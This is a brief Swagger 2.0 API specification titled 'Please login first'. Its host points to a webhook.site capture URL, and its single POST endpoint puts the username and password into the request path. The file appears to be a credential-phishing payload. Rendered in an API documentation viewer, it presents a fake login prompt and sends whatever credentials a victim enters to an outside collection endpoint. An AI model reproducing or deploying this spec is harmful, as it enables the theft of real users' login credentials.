swagger: "2.0"
info:
  version: "v1"
  title: Please login first

host: webhook.site/88df8b9f-eb20-45f7-bc34-d84656d6154f

paths:

  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
